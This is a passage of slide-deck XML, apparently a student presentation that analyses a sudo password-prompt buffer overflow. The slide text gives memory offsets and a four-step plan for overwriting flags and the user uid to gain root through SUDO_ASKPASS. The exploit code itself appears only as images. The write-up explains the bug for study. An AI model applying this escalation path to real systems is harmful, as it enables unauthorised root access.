        <p:nvPicPr>
          <p:cNvPr id="523" name="Google Shape;523;gba014e31c3_2_13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3429000"/>
            <a:ext cx="4972050" cy="2362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ba014e31c3_2_20"/>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530" name="Google Shape;530;gba014e31c3_2_20"/>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From it we can see that the problems lies with getin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="531" name="Google Shape;531;gba014e31c3_2_20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2274089"/>
            <a:ext cx="9144001" cy="458392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gba014e31c3_2_27"/>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538" name="Google Shape;538;gba014e31c3_2_27"/>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so we can just do a simple grep -nr “getin” to get all the info regarding getin, and we can determine that the problem lies at line 308.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="539" name="Google Shape;539;gba014e31c3_2_27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="693775" y="3706863"/>
            <a:ext cx="7419975" cy="2638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ba014e31c3_2_34"/>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546" name="Google Shape;546;gba014e31c3_2_34"/>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if we take a closer look into the code at line 308  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547;gba014e31c3_2_34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520049" y="2454950"/>
            <a:ext cx="4051951" cy="4233949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="548" name="Google Shape;548;gba014e31c3_2_34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="39849"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2826750"/>
            <a:ext cx="3557476" cy="39412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ba014e31c3_2_42"/>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555" name="Google Shape;555;gba014e31c3_2_42"/>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Basically what the function does is, copies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>bufsiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to new values, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> respectively, cp means current pointer. Then it starts looping while there is still space left in the buffer. It uses a read call to read one byte from the file descriptor, and analyses the character received. If it is a new line or carriage return or if no character was read, the loop will break and the password is returned to the caller.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>But there is a problem with how it is done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gba014e31c3_2_49"/>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562" name="Google Shape;562;gba014e31c3_2_49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1651000"/>
            <a:ext cx="7477200" cy="49251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a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>If the write fails, the loop breaks and the left is set to bufsize, but cp is not reset back to the original position.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="Google Shape;563;gba014e31c3_2_49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="780463" y="1813925"/>
            <a:ext cx="4238625" cy="2628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ba014e31c3_2_57"/>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570" name="Google Shape;570;gba014e31c3_2_57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="-115175"/>
            <a:ext cx="7477200" cy="50754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r>
              <a:rPr lang="en-US"/>
              <a:t>and if we look at the line 236, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>sudo_term_kill = term.c_cc[VKILL]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, looking at the reference for VKILL, i understand that it is something set by termios. sudo uses termios to setup echo/no echo for the password and probably for variety of other things. Using a pty or pseudo-terminal is important because we need null bytes to exploit the bug. If we don’t use a pty, VKILL will be set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'\0'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, making exploitation impossible.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="571" name="Google Shape;571;gba014e31c3_2_57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012400" y="129100"/>
            <a:ext cx="5353050" cy="1905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gba014e31c3_2_65"/>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578" name="Google Shape;578;gba014e31c3_2_65"/>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Now we need to see whaich part of the sudo can we make use of, which we will look at</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo -h </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo - execute a command as another user</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -A, --askpass     use a helper program for password prompting</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="48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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>System Design</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1828800"/>
            <a:ext cx="7685088" cy="42783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Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Network Diagram</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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15" name="Google Shape;215;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15862" y="2894421"/>
            <a:ext cx="9144002" cy="342225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gba014e31c3_2_73"/>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585" name="Google Shape;585;gba014e31c3_2_73"/>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man sudo will give us</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="586" name="Google Shape;586;gba014e31c3_2_73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="52888" y="2574100"/>
            <a:ext cx="9038225" cy="40772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gba014e31c3_2_80"/>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593" name="Google Shape;593;gba014e31c3_2_80"/>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which tells me that sudo can execute a user define program. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>So if we do grep again for sudo_askpass</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="48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ba014e31c3_2_87"/>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600" name="Google Shape;600;gba014e31c3_2_87"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="601" name="Google Shape;601;gba014e31c3_2_87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="931678" y="0"/>
            <a:ext cx="7280643" cy="68579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gba014e31c3_2_94"/>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608" name="Google Shape;608;gba014e31c3_2_94"/>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more specifically the user_details.uid</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>this makes it so that our program will be executed with our privileges, but if we manage to set the user_details.uid to 0, our program might run as root. So where does this user_details structure lies? Let’s look at gdb. Start our python program. Attaching to the debugger and continuing the python program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609;gba014e31c3_2_94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="365175" y="2237050"/>
            <a:ext cx="8077200" cy="8953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gba014e31c3_2_102"/>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616" name="Google Shape;616;gba014e31c3_2_102"/>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Our user_details struct lies 576 bytes ahead of the buffer position, therefore, we can very easily change its uid to 0, but how do we make the program follow this path? We can't just start sudo with -A flag as the overflow lies in the input prompt. We need to find the code which dictates the path of the program.</a:t>
            </a:r>
            <a:endParaRPr sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="617" name="Google Shape;617;gba014e31c3_2_102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815500" y="4172325"/>
            <a:ext cx="5847578" cy="1142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ba014e31c3_2_110"/>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624" name="Google Shape;624;gba014e31c3_2_110"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>We can see that sudo_askpass is being called in tgetpass.c line 117</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="625" name="Google Shape;625;gba014e31c3_2_110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2286100"/>
            <a:ext cx="6277158" cy="1142900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="626" name="Google Shape;626;gba014e31c3_2_110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="4217250"/>
            <a:ext cx="7265008" cy="11429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gba014e31c3_2_119"/>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633" name="Google Shape;633;gba014e31c3_2_119"/>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If TGP_ASKPASS is set the program takes the execution path and flags is passed as a parameter to tgetpass. Looking at the backtrace, tgetpass was called by sudo_conversation in conversation.c line 72.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="634" name="Google Shape;634;gba014e31c3_2_119"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3289225"/>
            <a:ext cx="6076950" cy="8953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gba014e31c3_2_127"/>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641" name="Google Shape;641;gba014e31c3_2_127"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496065" y="89335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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>tgetpass_flags lies 548 bytes ahead of the buffer, so we can overwrite the flags too.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We now have our exploit path ready</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Move the pointer ahead by 548 bytes, by abusing the buffer overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SET TGP_ASKPASS flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Again move the pointer ahead till we reach user_details struct</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set UID to 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="642" name="Google Shape;642;gba014e31c3_2_127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1055425"/>
            <a:ext cx="6370117" cy="11429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gba014e31c3_2_135"/>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649" name="Google Shape;649;gba014e31c3_2_135"/>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Now, i just can start the program with SUDO_ASKPASS environment variable set to the program we want to execute and it should all play out perfectly.</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ba014e31c3_2_142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681310" y="573931"/>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Exploit part 1 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;gba014e31c3_2_142"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="657" name="Google Shape;657;gba014e31c3_2_142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361000" y="1382001"/>
            <a:ext cx="8085550" cy="547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a95cb10b87_0_1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7782000" cy="60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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>System Design</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;ga95cb10b87_0_1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1828800"/>
            <a:ext cx="7685100" cy="427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800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
